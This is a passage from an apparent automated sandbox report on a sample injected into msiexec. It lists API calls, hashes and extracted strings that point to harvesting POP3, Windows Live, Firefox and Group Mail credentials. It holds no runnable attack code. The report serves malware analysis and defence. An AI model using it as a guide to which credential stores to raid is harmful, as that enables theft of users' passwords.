                                                                                                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                      APIs
                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                      • API String ID: 945165440-3589380929
                                                                                                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                      • String ID: %s@gmail.com
                                                                                                      • API String ID: 3261640601-4097000612
                                                                                                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                      • API String ID: 632640181-966475738
                                                                                                      • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                      • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 2485852401-0
                                                                                                      • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                      • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                      • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                      • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                      • String ID:
                                                                                                      • API String ID: 3642520215-0
                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                      • memset.MSVCRT ref: 00405C3B
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2313361498-0
                                                                                                      • Opcode ID: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                                                                      • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                      • Opcode Fuzzy Hash: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                                                                      • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Defer$Rect$BeginClient
                                                                                                      • String ID:
                                                                                                      • API String ID: 2126104762-0
                                                                                                      • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                      • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                      • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                      • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1999381814-0
                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 438689982-4203073231
                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                      • API String ID: 643879872-978417875
                                                                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DAE3
                                                                                                      • memset.MSVCRT ref: 0040DAF7
                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen$_memicmp
                                                                                                      • String ID: user_pref("
                                                                                                      • API String ID: 765841271-2487180061
                                                                                                      • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                      • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                      • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                      • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4281309102-0
                                                                                                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                      • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                      • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,682F7B60,?), ref: 004081B9
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                      • API String ID: 524865279-2190619648
                                                                                                      • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                      • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00406B8E
                                                                                                      • strlen.MSVCRT ref: 00406B99
                                                                                                      • strlen.MSVCRT ref: 00406BFF
                                                                                                      • strlen.MSVCRT ref: 00406C0D
                                                                                                      • strlen.MSVCRT ref: 00406BA7
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
